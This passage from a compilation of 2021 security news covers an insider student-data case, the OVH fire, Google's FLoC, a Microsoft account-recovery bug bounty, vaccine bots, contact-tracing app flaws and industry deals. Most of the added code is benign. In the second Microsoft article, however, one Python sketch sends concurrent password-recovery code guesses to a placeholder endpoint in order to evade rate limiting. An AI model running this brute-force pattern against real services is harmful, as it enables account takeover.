Another witness told authorities that Carroll would have received a notification each time her daughter logged onto the FOCUS system, according to the Post. The witness added that Carroll was required to change her password for the FOCUS system every 45 days, meaning she would have had to have shared each of the new passwords with her daughter for her to maintain access.

Carroll met with the Escambia County School board on Nov. 4 about the alleged abuse of the school’s student data. On Nov. 5, the district contacted the Florida Department of Law Enforcement [FDLE] to report she and her daughter “were involved in potential unauthorized access to student FOCUS accounts,” the Post added.

“The investigation also found that beginning August 2019, Carroll’s FOCUS account accessed 372 high school records, and 339 of those were of Tate High School students,” FDLE said in a news release.

Both Carroll and her daughter were arrested on one count each of offenses against users of computers, computer systems, computer networks and electronic devices (a third-degree felony); unlawful use of a two-way communications device (also a third-degree felony); criminal use of personally identifiable information (yet another third-degree felony); and conspiracy to commit these offenses (a first-degree misdemeanor), according to the FDLE.

School-District Insider Threats
With schools under constant threat of cyberattack, targeted by malware, phishing, distributed denial of service (DDoS), Zoom-bombings and more, abuse from trusted users and insider threats is also something that needs to be checked. A joint alert issued from CISA and the FBI last December called schools a “data-rich environment of student information.”

And in case there was any question about how seriously law enforcement tends to take this type of breach of student data, just look at the consequences Carroll and her daughter are facing.

Carroll was arrested and booked into the county jail and released after posting $6,000 bond, according to the Post, while her daughter was taken to the juvenile detention center. Carroll was also suspended from her job, the Post said.


OVH data centers suffered a fire, many popular sites are offline
11.3.2021
Security  Securityaffairs

OVH, the largest hosting provider in Europe and one of the largest in the world, has suffered a devastating fire that destroyed data centers at its Strasbourg site.

The news was also confirmed by OVH founder Octave Klaba via Twitter, who also provided a series of updates on the incident.

The French plant in Strasbourg comprises four data centers, SBG1, SBG2, SBG3, and SBG4, all of which were shut down due to the incident; the fire started in SBG2. Firefighters immediately acted to contain the fire, but the situation at SBG2 rapidly went out of control. The authorities isolated the entire plant and closed off its perimeter.

The company is urging its customers to implement their disaster recovery plans because the fire has disrupted its services.

“At 00:47 on Wednesday, March 10, 2021, a fire broke out in a room in one of our 4 datacenters in Strasbourg, SBG2. Please note that the site is not classified as a Seveso site.” reads the announcement published by the company on the status page. “From 5:30 am, the site has been unavailable to our teams for obvious security reasons, under the direction of the prefecture. The fire is now contained. We are relieved that no one was injured, neither among our teams nor among the firefighters and the services of the prefecture, whom we thank for their exemplary mobilization at our side.”

Image: the OVH data center fire in Strasbourg (photo credit: Xavier Garreau, @xgarreau)
The fire is now out and firefighters continue working to cool the buildings, while the company assesses the damage.

OVH has 15 data centers in Europe and 27 worldwide; it is working to support its customers and mitigate the impact of the incident at the Strasbourg site.

According to the update provided by Klaba at 11:20 am GMT, all servers in SBG3 are okay, but still non-operational.

At 1 pm, the company publicly shared a recovery plan for its operations covering the next two weeks.


Google Will Use 'FLoC' for Ad Targeting Once 3rd-Party Cookies Are Dead
5.3.2021
Security  Thehackernews
Signaling a major shift to its ads-driven business model, Google on Wednesday unequivocally stated it would not build alternate identifiers or tools to track users across multiple websites once it begins phasing out third-party tracking cookies from its Chrome browser by early 2022.

"Instead, our web products will be powered by privacy-preserving APIs which prevent individual tracking while still delivering results for advertisers and publishers," said David Temkin, Google's director of product management for ads privacy and trust.

"Advances in aggregation, anonymization, on-device processing and other privacy-preserving technologies offer a clear path to replacing individual identifiers."

The changes, which could potentially reshape the advertising landscape, are expected only to cover websites visited via Chrome and do not extend to mobile apps.

At the same time, Google acknowledged that other companies might find alternative ways to track individual users. "We realize this means other providers may offer a level of user identity for ad tracking across the web that we will not," Temkin said. "We don't believe these solutions will meet rising consumer expectations for privacy, nor will they stand up to rapidly evolving regulatory restrictions."

Over the years, third-party cookies have become the mainstay driving digital ad business, but mounting concerns about data privacy infringement have led major browser vendors such as Apple, Mozilla, Brave, and Microsoft to introduce countermeasures to pull the plug on invasive tracking technology, in turn forcing Google to respond with similar privacy-first solutions or risk losing customer trust.

FLoC and FLEDGE for Privacy-Preserving Ad Targeting
For its part, the search giant — in an attempt to balance its twin roles as a web browser developer and owner of the world's largest advertising platform — early last year announced plans to eliminate third-party cookies in Chrome in favor of a new framework called the "Privacy Sandbox," which aims to protect anonymity while still delivering targeted ads without resorting to more opaque techniques like fingerprinting.

To that effect, Google has proposed a continually evolving collection of bird-themed ad targeting and measurement methods aimed at supplanting third-party cookies, chief among them being Federated Learning of Cohorts (FLoC) and TURTLEDOVE, which it hopes will emerge as the standards for serving ads on the web.

Leveraging a technique called on-device machine learning, FLoC essentially aims to classify online users into groups based on similar browsing behaviors, with each user's browser sharing what's called a "cohort ID" to websites and marketers, who can then target users with ads based on the groups they belong to.

In other words, the data gathered locally from the browser is never shared and never leaves the device. By using this interest-based advertising approach, the idea is to hide users "in the crowd," thereby keeping a person's browsing history private and offering protections from individualized tracking and profiling.
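To make the cohort idea concrete, here is a deliberately simplified toy sketch that derives a short "cohort ID" from a set of visited domains using a SimHash-style majority vote, so that similar browsing histories tend to land in the same group. It is an illustration of the grouping concept only, not Google's actual FLoC algorithm, and the domain names are made up.

import hashlib

def cohort_id(domains, bits=16):
    """Toy cohort assignment: similar sets of domains tend to map to similar IDs."""
    counts = [0] * bits
    for domain in domains:
        h = int.from_bytes(hashlib.sha256(domain.encode()).digest()[:8], "big")
        for i in range(bits):
            counts[i] += 1 if (h >> i) & 1 else -1
    # Majority vote per bit position builds the final identifier.
    return sum(1 << i for i in range(bits) if counts[i] > 0)

print(cohort_id({"news.example", "recipes.example", "weather.example"}))

Because only the short ID leaves the device, a site or advertiser sees which group a browser belongs to rather than the raw browsing history, which is the "hide in the crowd" property described above.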

TURTLEDOVE (and its extension called "FLEDGE"), on the other hand, suggests a new method for advertisers and ad tech companies to target an ad to an audience they had previously built without revealing other information about a user's browsing habits or ad interests.

Google is set to test FLoC-based cohorts publicly later this month, starting with Chrome 89, before extending the trials with advertisers in Google Ads in the second quarter.

Concerns About Control, Privacy, and Trust
While these privacy-preserving plans mean less personal data is sent to third-parties, questions are being raised about how users will be grouped together and what guardrails are being put in place to avoid unlawful discrimination against certain groups based on sensitive attributes such as ethnicity, religion, gender, or sexual orientation.

Outlining that the change in underlying infrastructure involves sharing new information with advertisers, the Electronic Frontier Foundation (EFF) equated FLoC to a "behavioral credit score," calling it a "terrible idea" that creates new privacy risks, including the likelihood that websites will uniquely fingerprint FLoC users and access more personal information than is required to serve relevant ads.

"If you visit a site for medical information, you might trust it with information about your health, but there's no reason it needs to know what your politics are," EFF's Bennett Cyphers said. "Likewise, if you visit a retail website, it shouldn't need to know whether you've recently read up on treatment for depression. FLoC erodes this separation of contexts, and instead presents the same behavioral summary to everyone you interact with."

Also of note is the scope and potential implications of Privacy Sandbox.

With Chrome's widespread market share of over 60% across desktop and mobile devices, Google's attempts to replace the cookie have been met with skepticism and pushback, not to mention attracting regulatory scrutiny earlier this year over worries that "the proposals could cause advertising spend to become even more concentrated on Google's ecosystem at the expense of its competitors."

The initiative has also been called out for being under Google's control and fears that it may only serve to tighten the company's grip on the advertising industry and the web as a whole, which critics say will "force more marketers into their walled garden and will spell the end of the independent and Open Web."

In response, Google noted it has taken into account the feedback about browser-centric control by incorporating what it calls a "trusted server" in FLEDGE to store information about an ad campaign's bids and budgets.

All said and done, third-party cookies aren't the only means of delivering ads on the web. Companies that collect first-party data, including Facebook and Google, will still be able to serve personalized ads, as will ad tech firms that embrace a DNS technique called CNAME cloaking to pass off third-party tracking code as coming from a first party.

"Keeping the internet open and accessible for everyone requires all of us to do more to protect privacy — and that means an end to not only third-party cookies, but also any technology used for tracking individual people as they browse the web," Google said, adding it remains "committed to preserving a vibrant and open ecosystem where people can access a broad range of ad-supported content with confidence that their privacy and choices are respected."


Microsoft Pays $50,000 Bounty for Account Takeover Vulnerability
4.3.2021
Security  Securityweek

A security researcher says Microsoft has awarded him a $50,000 bounty reward for reporting a vulnerability that could have potentially allowed for the takeover of any Microsoft account.

The issue, India-based independent security researcher Laxman Muthiyah reveals, could have been abused to reset the password of any account on Microsoft’s online services, but wasn’t that easy to exploit.

The attack, the researcher explains, targets the password recovery process that Microsoft has in place, which typically requires the user to enter their email or phone number to receive a security code, and then enter that code.

Typically, a 7-digit security code is received, meaning that the user is provided with one of 10 million possible codes.

An attacker who wants to gain access to the targeted user’s account would need to correctly guess the code or be able to try as many of these codes as possible, until they enter the correct one.

Microsoft has a series of mechanisms in place to prevent attacks, including limiting the number of attempts to prevent automated brute forcing and blacklisting an IP address if multiple consecutive attempts are made from it.

What Muthiyah discovered, however, was not only a technique to automate the sending of requests, but also the fact that the system would no longer block the requests if they reached the server simultaneously (even the slightest delay would trigger the defense mechanism).

“I sent around 1000 seven digit codes including the right one and was able to get the next step to change the password,” the researcher says.

The attack is valid for accounts without two-factor authentication (2FA) enabled, but even the second authentication step could be bypassed, using the same type of attack, Muthiyah says. Specifically, the user is first prompted to provide a 6-digit code that their authenticator app has generated, and then the 7-digit code received via email or phone.

“Putting all together, an attacker has to send all the possibilities of 6 and 7 digit security codes that would be around 11 million request attempts and it has to be sent concurrently to change the password of any Microsoft account (including those with 2FA enabled),” the researcher says.

The issue was reported to Microsoft last year and a patch was rolled out in November. Microsoft awarded the researcher a $50,000 bug bounty reward as part of its Identity Bounty Program, assessing the vulnerability with a severity rating of important and considering it an “Elevation of Privilege (Involving Multi-factor Authentication Bypass)” -- this type of issue has the highest security impact in Microsoft’s Identity Bounty Program.

The only reason the vulnerability was not rated critical severity, the researcher notes, was the complexity of the attack. To process and send large numbers of concurrent requests, an attacker would need a good deal of computing power, along with the ability to spoof thousands of IP addresses.


Google Vows to Stop Tracking Individual Browsing for Ads
4.3.2021
Security  Securityweek

Google on Wednesday pledged to steer clear of tracking individual online activity when it begins implementing a new system for targeting ads without the use of so-called "cookies."

The internet giant's widely used Chrome browser this month will begin testing an alternative to the tracking practice that it believes could improve online privacy while still enabling advertisers to serve up relevant messages.

"We're making explicit that once third-party cookies are phased out, we will not build alternate identifiers to track individuals as they browse across the web, nor will we use them in our products," ads privacy and trust product management director David Temkin said in a blog post.

"Advances in aggregation, anonymization, and on-device process and other privacy-preserving technologies offer a clear path to replacing individual identifiers."

The move comes with Google hammered by critics over user privacy and facing increased scrutiny over how it protects people's data rights.

Growing fear of cookie-tracking has prompted support for internet rights legislation such as GDPR in Europe.

Temkin described the new Google system as "privacy-preserving... while still delivering results for advertisers and publishers."

Safari and Firefox browsers have already done away with third-party cookies, but they are still used by the world's most popular browser, Chrome.

Chrome accounted for 63 percent of the global browser market last year, according to StatCounter.

Last month, Google unveiled the results of tests showing an alternative to cookies called Federated Learning of Cohorts (FLoC) which identifies groups of people with common interests without individualized tracking.

Some businesses have objected to the Google plan claiming it will force more advertisers into its "walled garden."


Microsoft Expands Secured-core to Servers, IoT Devices
4.3.2021
Security  Securityweek

Microsoft this week announced Secured-core Server and Edge Secured-core, two solutions aimed at improving the security of servers and connected devices.

Initially announced in 2019, Secured-core is the result of a partnership between Microsoft and hardware manufacturers, and its goal is to add a security layer that combines identity, virtualization, operating system, hardware and firmware protection capabilities.

When it introduced Secured-core PCs, Microsoft said they were ideal for industries handling highly sensitive information, such as financial services, government, and healthcare. The company is now expanding coverage to servers and Internet of Things (IoT) devices, aiming to protect them against common attack vectors.

“Secured-core functionality helps proactively close the door on the many paths that attackers may try to exploit, and it allows IT and SecOps teams to optimize their time across other priorities,” the tech company says.

Secured-core Server aims to deliver not only advanced protection, but also simplified security and preventative defense. Thus, both hardware and firmware that manufacturers bring to market should satisfy specific security requirements.

Secured-core certified systems that feature secure hardware platforms are available for both Windows Server and validated Azure Stack HCI solutions, the company says.

The expanded coverage is accompanied by new functionality in the Windows Admin Center, allowing customers to configure the OS security features of Secured-core for Windows Server and Azure Stack HCI systems directly from a web browser. Manufacturers have the option to enable OS features for Azure Stack HCI systems.

Secured-core Servers feature hardware root-of-trust (courtesy of capabilities such as BitLocker, which leverages Trusted Platform Module 2.0), firmware protection (with support for Dynamic Root of Trust of Measurement (DRTM) technology), and support for virtualization-based security (VBS) and hypervisor-based code integrity (HVCI) to isolate parts of the OS and protect against entire classes of vulnerabilities.

Edge Secured-core, on the other hand, seeks to improve the built-in security of IoT devices running a full OS and also brings Secured-core to Linux.

Microsoft is also making Edge Secured-core available in public preview within the Azure Certified Device program. Certified devices meet additional security requirements related to device identity, data protection, device updates, secure boot, OS hardening, and vulnerability disclosures.

Edge Secured-core devices feature a zero-trust attestation model, a built-in security agent, and security by default, to enforce system integrity, deliver hardware-based device identity, be remotely manageable, stay updated, and deliver protection for data.


A $50,000 Bug Could've Allowed Hackers to Access Any Microsoft Account
4.3.2021
Security  Thehackernews

Microsoft has awarded an independent security researcher $50,000 as part of its bug bounty program for reporting a flaw that could have allowed a malicious actor to hijack users' accounts without their knowledge.

Reported by Laxman Muthiyah, the vulnerability made it possible to brute-force the seven-digit security code that's sent to a user's email address or mobile number to verify their identity before the password is reset and access to the account is recovered.

Put differently, the account takeover scenario is a consequence of privilege escalation stemming from an authentication bypass at an endpoint which is used to verify the codes sent as part of the account recovery process.

The company addressed the issue in November 2020, before details of the flaw came to light on Tuesday.

Although there are encryption barriers and rate-limiting checks designed to prevent an attacker from automatically submitting all 10 million possible codes, Muthiyah said he eventually cracked the encryption function used to cloak the security code, which allowed him to send multiple concurrent requests.

Indeed, Muthiyah's tests showed that out of 1000 codes that were sent, only 122 of them got through, with the others blocked with the error code 1211.

"I realized that they are blacklisting the IP address [even] if all the requests we send don't hit the server at the same time," the researcher said in a write-up, adding that "a few milliseconds delay between the requests allowed the server to detect the attack and block it."

Following this discovery, Muthiyah said he was able to get around the rate-limiting constraint and reach the next step of changing the password, thereby allowing him to hijack the account.
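Muthiyah's write-up does not include code, but the concurrency pattern he describes (launching every request at effectively the same instant, so that no inter-request delay can trip the rate limiter) can be sketched with Python's asyncio and the third-party aiohttp library. The endpoint, parameter name and success check below are hypothetical placeholders rather than Microsoft's actual API:

```python
import asyncio
import aiohttp

# Hypothetical endpoint and parameter name, for illustration only.
VERIFY_URL = "https://example.com/recover/verify"

async def try_code(session: aiohttp.ClientSession, code: str) -> bool:
    # Each coroutine posts one candidate code. asyncio.gather() below starts
    # them in the same event-loop tick, so the requests leave the host with
    # virtually no delay between them.
    async with session.post(VERIFY_URL, data={"code": code}) as resp:
        return resp.status == 200  # assume 200 means the code was accepted

async def main() -> None:
    codes = [f"{n:07d}" for n in range(1000)]  # a small demo batch
    async with aiohttp.ClientSession() as session:
        results = await asyncio.gather(*(try_code(session, c) for c in codes))
    print(f"{sum(results)} of {len(codes)} candidate codes were accepted")

asyncio.run(main())
```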

While this attack only works in cases where the account is not secured by two-factor authentication, it can still be extended to defeat the two layers of protection and modify a target account's password — something that could be prohibitive given the amount of computing resources required to mount an attack of this kind.

"Putting all together, an attacker has to send all the possibilities of 6 and 7 digit security codes that would be around 11 million request attempts and it has to be sent concurrently to change the password of any Microsoft account (including those with 2FA enabled)," Muthiyah said.

Separately, Muthiyah applied a similar technique to Instagram's account recovery flow, sending 200,000 concurrent requests from 1,000 different machines and finding that account takeover was possible there as well. He was rewarded $30,000 as part of that company's bug bounty program.

"In a real attack scenario, the attacker needs 5000 IP addresses to hack an account," Muthiyah noted. "It sounds big but that's actually easy if you use a cloud service provider like Amazon or Google. It would cost around 150 dollars to perform the complete attack of one million codes."


Meet the Vaccine Appointment Bots, and Their Foes
27.2.2021  Security  Securityweek

Having trouble scoring a COVID-19 vaccine appointment? You’re not alone. To cope, some people are turning to bots that scan overwhelmed websites and send alerts on social media when slots open up.

They’ve provided relief to families helping older relatives find scarce appointments. But not all public health officials think they’re a good idea.

In rural Buckland, Massachusetts, two hours west of Boston, a vaccine clinic canceled a day of appointments after learning that out-of-towners scooped up almost all of them in minutes thanks to a Twitter alert. In parts of New Jersey, health officials added steps to block bots, which they say favor the tech-savvy.

What is a Vaccine Bot?

Bots — basically autonomous programs on the web — have emerged amid widespread frustration with the online world of vaccine appointments.

Though the situations vary by state, people often have to check multiple provider sites for available appointments. Weeks after the rollout began, demand for vaccines continues to outweigh supply, complicating the search even for eligible people as they refresh appointment sites to score a slot. When a coveted opening does appear, many find it can vanish midway through the booking.

The most notable bots scan vaccine provider websites to detect changes, which could mean a clinic is adding new appointments. The bots are often overseen by humans, who then post alerts of the openings using Twitter or text notifications.

A second type that’s more worrisome to health officials is the “scalper” bot, which could automatically book appointments, potentially to offer them up for sale. So far, there’s little evidence that scalper bots are taking appointments.

Are Vaccine Bot Alerts Helping?

Yes, for the people who use them.

“THANK YOU! THANK YOU! THANK YOU! I GOT MY DAD AN APPOINTMENT! THANK YOU SO MUCH!” tweeted Benjamin Shover, of Stratford, New Jersey, after securing a March 3 appointment for his 70-year-old father with the help of an alert from Twitter account @nj_vaccine.

The success came a month after Shover signed up for New Jersey’s state online vaccine registry.

“He’s not really tech-savvy,” Shover said of his father in an interview. “He’s also physically disabled, and has arthritis, so it’s tough for him to find an appointment online.”

The creator of the bot, software engineer Kenneth Hsu, said his original motivation was to help get an appointment for his own parents-in-law. Now he and other volunteers have set a broader mission of assisting others locked out of New Jersey’s confusing online appointment system.

“These are people who just want to know they’re on a list somewhere and they are going to be helped,” Hsu said. “We want everyone vaccinated. We want to see our grandparents.”

What do Health Officials Think?

The bots have met resistance in some communities. A bot that alerted Massachusetts residents to a clinic this week in sparsely populated Franklin County led many people from the Boston area to sign up for the slots. Local officials canceled all of the appointments, switched to a private system and spread the word through senior centers and town officials.

“Our goal was to help our residents get their vaccination,” said Tracy Rogers, emergency preparedness manager for the Franklin Regional Council of Governments. “But 95% of the appointments we had were from outside Franklin County.”

New Jersey’s Union County put a CAPTCHA prompt in its scheduling system to confirm visitors are human, blocking efforts “to game” it with a bot, said Sebastian D’Elia, a county spokesperson.

“When you post on Twitter, only a certain segment of society is going to see that,” he said. Even when bot users are trying to help someone else, D’Elia said, many residents do not have the luxury of someone advocating for them.

But the person who created a bot that’s now blocked in Union County, 24-year-old computer programmer Noah Marcus, said the current system isn’t fair, either.

“The system was already favoring the tech-savvy and the person who can just sit in front of their computer all day, hitting refresh,” Marcus said.

D’Elia said the county is also scheduling appointments by phone to help those who might have trouble online.

How do They Work?

Marcus used the Python coding language to create a program that sifts through a vaccine clinic website, looking for certain keywords and tables that would indicate new appointments. Other bots use different techniques, depending on how the target website is built.
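Marcus's bot is not public, but the general pattern he describes can be sketched in a few lines of Python, assuming the requests and BeautifulSoup libraries; the clinic URL, keywords and polling interval below are hypothetical:

```python
import time

import requests
from bs4 import BeautifulSoup

# Hypothetical target page and signal keywords, for illustration only.
CLINIC_URL = "https://example.org/vaccine-clinic"
KEYWORDS = ("appointments available", "book now")

def has_new_slots(html: str) -> bool:
    soup = BeautifulSoup(html, "html.parser")
    text = soup.get_text(" ", strip=True).lower()
    # A keyword appearing anywhere on the page, or a schedule table showing
    # up, is treated as a hint that slots may have been added.
    return any(kw in text for kw in KEYWORDS) or soup.find("table") is not None

def watch(poll_seconds: int = 60) -> None:
    while True:
        page = requests.get(CLINIC_URL, timeout=10)
        if has_new_slots(page.text):
            print("Possible new appointments; this is where an alert would go out.")
        time.sleep(poll_seconds)

watch()
```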

This kind of information gathering, known as web scraping, remains a source of rancor. Essentially, scraping is collecting information from a website that its owner doesn’t want collected, said Orin Kerr, a law professor at the University of California, Berkeley.

Some web services have taken web scrapers to court, saying scraping techniques violate the terms and conditions for accessing their sites. One case involving bots that scraped LinkedIn profiles is before the U.S. Supreme Court.

“There’s disagreement in the courts about the legality of web-scraping,” Kerr said. “It’s a murky area. It’s probably legal but it’s not something we have certainty about.”

The website for a mass vaccination site in Atlantic City, New Jersey says its online queue system — which keeps people waiting on the site as slots are allotted — is designed to prevent it from crashing and to stop bots from snapping up appointments “from real people.” But is that actually happening?

Making a bot that can actually book appointments -- not just detect them -- would be a lot harder. And sites usually ask for information such as a person’s date of birth to make sure they are eligible.

Pharmacy giants Walgreens and CVS, which are increasingly giving people shots across the U.S., have already said they’ve been working to prevent such activity.

Walgreens said it is using cybersecurity techniques to detect and prevent bots so that “only authorized and eligible patients will have access to schedule a vaccine appointment.” CVS Health said it’s encountered various types of automated activities and has designed its appointment-making system to validate legitimate users.


Security, Privacy Issues Found in Tens of COVID-19 Contact Tracing Apps
27.2.2021 
Security  Securityweek

An analysis of 40 COVID-19 contact tracing applications for Android has led to the discovery of numerous security and privacy issues, according to a new research paper.

Contact tracing applications have been created to help authorities automate the process of identifying those who have been in close contact with infected individuals.

Using a newly developed tool called COVIDGuardian, which was designed for both static and dynamic program analysis, academic researchers with universities in Australia and the United Kingdom analyzed 40 worldwide Android contact tracing apps and discovered potential security risks in more than half of them.

COVIDGuardian, an automated security and privacy assessment tool, was used to assess the security performance of the analyzed applications against four categories, namely manifest weaknesses, general security vulnerabilities, data leaks (with a focus on personally identifiable information), and malware detection.

Identified issues, the researchers say, include the use of insecure cryptographic algorithms (72.5%), the storing of sensitive information in clear text (55%), insecure random values (55%), permissions to perform backups (roughly 42.5% of apps), and the inclusion of trackers (20 trackers were identified in approximately 75% of the apps).
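COVIDGuardian itself combines static and dynamic analysis, but the simplest class of findings, hard-coded references to weak ciphers or insecure randomness, can be approximated with a naive pattern scan over decompiled sources. The patterns and directory layout below are illustrative assumptions, not the researchers' actual detection logic:

```python
import re
from pathlib import Path

# Rough indicators of weak crypto or insecure randomness in decompiled Java.
PATTERNS = {
    "weak cipher": re.compile(r'Cipher\.getInstance\("(DES|RC4|AES/ECB)'),
    "insecure random": re.compile(r"\bnew Random\("),
}

def scan_sources(root: str) -> None:
    """Walk decompiled sources (e.g. jadx output) and flag suspicious lines."""
    for path in Path(root).rglob("*.java"):
        for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
            for label, pattern in PATTERNS.items():
                if pattern.search(line):
                    print(f"{path}:{lineno}: possible {label}: {line.strip()}")

scan_sources("decompiled_app/")  # hypothetical decompiler output directory
```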

The research revealed not only that the security of these apps is only slightly influenced by the use of a decentralized architecture, but also that users are more likely to install a contact tracing app that has stronger privacy settings.

After being contacted by the researchers, some of the application developers addressed identified issues, including the leak of information and the inclusion of trackers. Other apps, however, were found to include even more vulnerabilities and trackers after they were updated.

The researchers also conducted a survey of more than 370 people regarding the use of contact tracing apps, their concerns, and their preference on centralized or decentralized apps.

“Security and privacy concerns have been a big issue affecting the uptake of these apps,” said Dr Gareth Tyson, senior lecturer at Queen Mary University of London and one of the authors of the study. “We were surprised that the debate around decentralised vs centralised apps didn’t seem so important and, instead, users were more focused on the exact details of what private information is collected. This should encourage developers to offer stronger privacy guarantees for their apps.”


The Race to Find Profits in Securing Email

26.2.2021 Security  Securityweek

NEWS ANALYSIS -- More than 17 years after Bill Gates’s famous declaration that the spam problem was close to being solved for good, the corporate inbox continues to be a lucrative target for malicious hackers. Now, a wave of well-funded email security startups are emerging to take another stab at securing the entry point for almost all major cyber attacks.

Email security specialist Armorblox on Thursday announced a new $30 million venture capital funding round, joining a growing list of well-heeled startups taking a stab at addressing one of cybersecurity’s most difficult problems: keeping malicious hackers out of corporate mailboxes.

Armorblox, based in Sunnyvale, Calif., has now banked a total of $46.5 million, positioning itself to keep chipping away at the market share of incumbents like Proofpoint, Mimecast and Forcepoint.

The company says it will use the new funding to build out its engineering and data science teams and double down on its bet that the magic of machine learning can effectively address the kinds of targeted email attacks that hit businesses of all sizes.

Armorblox sells a platform that connects over APIs and analyzes thousands of signals to understand the context of email communications. Security teams can use the data from the platform to block targeted phishing attacks, protect sensitive PII and PCI, and automate remediation of user-reported email threats.

While the overuse of “ML/AI” buzzwords can ruin any attempt at properly discussing ML/AI capabilities, Armorblox CEO DJ Sampath is bullish on leveraging natural language understanding, deep learning, traditional machine learning, and detection techniques to organize signals across identity, behavior and language. “If legacy email protection controls are padlocks, think of Armorblox as a fingerprint scanner,” he said.

Sampath believes this approach also helps with the tricky problem of remediation where defenders walk the tightrope between safety and employee productivity.

He is betting that “context-aware threat detection” will be much more reliable and efficient than today’s collection of threat feeds, metadata and one-shot detection tools built into incumbent email security offerings.

With cybersecurity-related spending hitting astronomical numbers and massive security data lakes now providing revenues for tech companies, Armorblox has bigger ambitions in a data-centric, post-pandemic, work-from-home world.

Sampath isn’t shy about his company’s aspirations to find treasure in use-cases beyond cybersecurity: “We believe that the ability to create a single system that can combine a universal understanding of all content and a proper catalog of contextualized interactions with the data can serve a variety of purposes far beyond just detecting cases of intellectual property misuse over email or business email compromise scenarios.”

Armorblox isn’t alone with heady big-data ambitions but it will be a long slog against dozens of well-funded startups, entrenched incumbents and headwinds from the cloud email providers themselves -- Microsoft (Office 365/Teams), Google (GSuite/VirusTotal/GCloud).

Microsoft and Google provide the developer APIs that allow “inside-out” security technologies to bake detection and other logic into email traffic flows but, as is clear lately, the bigger tech vendors have their own cybersecurity business ambitions.

Another early-stage email security play worth watching is Material Security, a company that came out of stealth last June with $22 million in funding from Andreessen Horowitz and a roster of CISOs publicly backing its inline approach to everything from two-factor authentication to attachment recovery.

Material Security, the brainchild of ex-Dropbox engineers Ryan Noon, Abhishek Agrawal and Chris Park, offers security teams the ability to redact sensitive content in email -- even older archived mail -- and make it available only after a two-factor verification step. This lets the company market itself across leak prevention, account takeover (ATO) protection, phishing herd immunity, and other visibility and admin controls.

Separately, a wide range of companies have received funding to play in the multi-billion dollar email security pond. These include Agari ($85 million raised), Valimail ($84 million raised), Area 1 ($82 million raised), Abnormal ($74 million), Avanan ($41 million), Inky ($32 million), and GreatHorn ($22 million).

Industry watchers expect the email security market to reach $6 billion by 2024, driven mostly by the rapid COVID-related digital transformation.


Robinhood Taps Caleb Sima to Lead Security
23.2.2021
Security  Securityweek

Caleb Sima to Join Robinhood as Chief Security Officer

Veteran cybersecurity practitioner, entrepreneur and executive Caleb Sima has been tapped to lead security at mobile stock trading startup Robinhood.

Sima, a security leader with an established presence in cybersecurity for more than two decades, announced the move on LinkedIn. He will be joining investing firm Robinhood as Chief Security Officer (CSO).

Sima was most recently VP of Security at Databricks and, before that, he managed security engineering, architecture, red team and vulnerability management at Capital One.

In the early 2000s, Sima co-founded application security startup SPI Dynamics and sold it to HP. He also co-founded Bluebox Security, a mobile security play that was acquired by Lookout in 2016.

Sima joins the embattled financial services firm Robinhood at a sensitive time, with the company facing massive mainstream media attention. The Menlo Park, Calif.-based company claims that about 13 million users trade stocks and ETFs on its mobile app.

The news of Sima’s hiring comes on the same day Reddit announced it had snagged Bank of America security executive Allison Miller to be its Chief Information Security Officer (CISO).

In other CISO-related people news, Cisco has promoted Anthony Grieco to the CISO slot following the departure of Mike Hanley.

Akamai’s Andy Ellis is also leaving the CSO role there after a 20-year career.


Palo Alto Networks Buys Bridgecrew in ‘Shift Left’ Cloud Security Push
17.2.2021
Security  Securityweek

Palo Alto Networks on Tuesday snapped up early-stage startup Bridgecrew, adding a cloud security platform for developers to its $3.4 billion-a-year enterprise product portfolio.

The two sides said the deal is valued at $156 million in cash and is expected to close in the third quarter this year.

For Palo Alto, the deal is part of a strategy to spend big to snap up early-stage companies in the cloud security and DevOps workflow space. The Bridgecrew deal follows a $420 million purchase of CloudGenix last March and a separate $173 million deal to buy Redlock, both cloud security specialist plays.

For Bridgecrew, an Israel-based venture-backed startup that’s barely two years old, the exit is significant. Bridgecrew raised a total of $18 million over two funding rounds with public reports pegging its valuation last year at around $40 million.

The company was founded by serial entrepreneur Idan Tendler with venture capital backing from Battery Ventures, NFX, Tectonic Ventures, DNX Ventures, Sorensen Ventures, and Homeward Ventures.

Bridgecrew styles itself as a pioneer in Shift Left, the popular practice aimed at finding and preventing defects early in the software delivery process. The idea is to improve quality by moving tasks to the left as early in the software lifecycle as possible, meaning that important security testing is done earlier in the software development process.

Bridgecrew’s security platform, which includes the Checkov open-source scanner, offers developers and DevOps teams a systematic way to enforce infrastructure security standards throughout the development lifecycle.
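As a toy illustration of the kind of policy-as-code rule such scanners automate (this is not Checkov's actual API; it simply flags one well-known Terraform misconfiguration, a publicly readable S3 bucket ACL, and fails the build when it finds one):

```python
import re
import sys
from pathlib import Path

# One hand-written rule: flag S3 buckets declared with a public ACL.
PUBLIC_ACL = re.compile(r'acl\s*=\s*"public-read(-write)?"')

def check_directory(root: str) -> int:
    findings = 0
    for tf_file in Path(root).rglob("*.tf"):
        for lineno, line in enumerate(tf_file.read_text().splitlines(), 1):
            if PUBLIC_ACL.search(line):
                print(f"FAILED {tf_file}:{lineno}: bucket ACL is public")
                findings += 1
    return findings

# A non-zero exit code is what lets a CI pipeline block the merge,
# which is the "shift left" idea in practice.
sys.exit(1 if check_directory(".") else 0)
```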

"Shift left security is a must-have in any cloud security platform. Developers don't want to wait until runtime to find out their security is not working, and the CISO charged with protecting the entire organization certainly values higher security from fixing issues earlier in the development lifecycle,” said Palo Alto chief executive Nikesh Arora.

Palo Alto also plans to fit Bridgecrew’s technology into its own Prisma Cloud to provide developers with security assessment and enforcement capabilities throughout the DevOps process.

Prisma Cloud is Palo Alto's security platform that sells into the enterprise cloud security posture management (CSPM) and cloud workload protection platform (CWPP) categories.

Palo Alto said it would continue to invest in Bridgecrew's open-source initiatives.


How kids coped with COVID-hit winter holidays
6.2.2021 
Security  Securelist
Due to the pandemic situation in late 2020, street festivities got canceled worldwide. For many families, get-togethers with grandparents over the Christmas period were also put on hold. As a result, children across the globe sought holiday fun and games from the comfort of home. And thanks to modern tech and the ubiquitous internet, they had no reason to be bored.

We analyzed and categorized the most popular websites and search queries over the festive period (December 20, 2020 — January 10, 2021) to find out how kids compensated for the lack of outdoor winter entertainment.

How we collect our statistics
Our Kaspersky Safe Kids solution for home users scans the contents of web pages that children try to visit. If the site falls into one of fourteen undesirable categories, the product sends an alert to Kaspersky Security Network. In doing so, no personal data is transmitted and user privacy is not violated. Note:

It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. However, anonymous statistics are collected for all the 14 categories.
The information in this report was obtained from computers running Windows and macOS; mobile statistics are not presented.
Website categorization
